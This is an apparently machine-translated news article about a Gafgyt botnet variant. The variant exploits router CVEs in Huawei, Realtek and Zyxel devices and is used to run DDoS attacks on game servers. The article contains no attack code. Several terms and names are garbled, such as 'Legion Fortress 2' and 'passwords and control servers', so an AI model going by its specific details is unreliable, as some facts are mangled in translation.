The collective “revolt” of IOT devices may put people in an awkward position. For example, the film Terminator: The Dark fate depicts a group of artificial intelligence defenses called Legions, which have a strong learning ability and control more than 70 percent of the world’s nuclear and human-shaped weapons. Soon, it came to the conclusion through self-evolution that the eradication of humanity was the only way to end the war. As a result, these extreme IOT products completely went mad, the battle of the apocalyptic began.
Although it is not known whether there will be anything like Legions in the future, there are already many similar botnets that will evolve and find ways to manipulate each host to create their own “rebel legions”.
On October 31st researchers released a report saying they had detected an up-to-date variant of the Gafgyt botnet. The variant targets defects in 32,000 small office and home wireless routers, including Zyxel, Huawei and Realtek, reducing the availability of network connectivity and significantly reducing security when logging in.
Gafgyt botnet “Evolutionary History”
Gafgyt was first discovered in 2014. Since then, it has been known for its large-scale distributed denial-of-service attacks, and many of its variants have started targeting a range of products across industries.
Since 2016, researchers at Zingbox, a cybersecurity firm, have noted that wireless routers are one of the most common IoT devices in all organizations and are the primary target of IoT botnets.
During this time, the Gafgyt botnet has completed several rounds of “evolution”:
In August 2014, Sony PSN was completely paralysed by a DDoS attack from the Gafgyt family, which the hacking group LizardSquad claimed responsibility for.
In December of that year, LizardSquad again used the family to launch a DDOS attack on Microsoft’s Xbox Live, preventing millions of gamers from connecting to game servers.
In January 2015, the source code of the Gafgyt family was made public, and its source code consists of only one .c file, with a total of 1600 plus lines of code (including the telnet scan module and weak password dictionary).
Since then, black-working practitioners have developed a large number of variants (such as Bashlite, Qbot, Tsunami, etc.) based on the family, so that the attack traces that originally belonged only to Lizard Squad are hidden.
Zombie cyberattacks may reduce the credibility of network sand and IP addresses. Botnets exploit vulnerabilities rather than trying to access connected devices by logging in through an unsecured service. As a result, botnets can be more easily propagated on IoT devices even if enterprise administrators disable insecure services and use powerful login credentials.
New variant of the Gafgyt family
The newly detected Gafgyt variant is a competitor to the JenX botnet. JenX exploits remote code execution vulnerabilities to access and recruit botnets to attack game servers, especially those running valve Source engines, and to launch denial-of-service (DDoS) attacks.
Gafgyt uses three “scanners” to try to execute an attack using the known remote code in the router above. These scanners replace the typical “dictionary” attacks used by other IoT botnets, which are often designed to compromise connected devices with insecure services.
The vulnerability is designed to be used as a binary remover to extract the appropriate binary files from a malicious server based on the type of device to be infected. The new Gafgyt variant can perform different types of DDoS attacks based on commands received from passwords and control servers, Zingbox researchers wrote in a blog post.
This new Gafgyt variant targets vulnerabilities in three wireless routers, two of which are the same as JenX – they share CVE-2017-17215 (in Huawei HG532) and CVE-2014-8361 (in Realtek’s RTL81XX chipset). CVE-2017-18368 (in Zyxel P660HN-T1A) is a new addition to Gafgyt.
Jen Miller-Osborn, deputy director of threat intelligence at Zingbox, said Gafgyt was developed based on JenX botnet code, which also highlights hackers’ interest in building botnets within that range.
“This evolution of Gafgyt shows that there is a group of people working to update these botnets, and they will sync the latest vulnerabilities into the botnets and use them to make their lineupstrong,” he said.
Game Server Lying Gun
The latest Gafgyt variant can perform a payload DDoS attack called Vaf. This can be used to attack the game server running Valve Source Engine, causing the game to go down.
Valve Source Engine is the engine that runs games such as Half Life, Legion Fortress 2, which has a audience of millions of people and will face a wide range of user complaints if the server goes down.
Of course, the latest Gafgyt variant isn’t just a game server with Valve Source Engine. Through other DDoS attackmethods, hackers can also target other servers hosting popular games such as Fortnite.
With the Gafgyt botnet, hackers can easily block the operation of game servers, but that doesn’t make them a huge revenue, says Miller-Osborn, a researcher at Zingbox. Therefore, the person who will do it may only pursue the pleasure of doing bad things.
“While game servers have become victims, the number of IoT devices targeted at these attacks is increasing. From simply attacking routers to gamers affecting small and medium-sized businesses and even a home, that’s the scary thing about this Gafgyt variant,” she adds.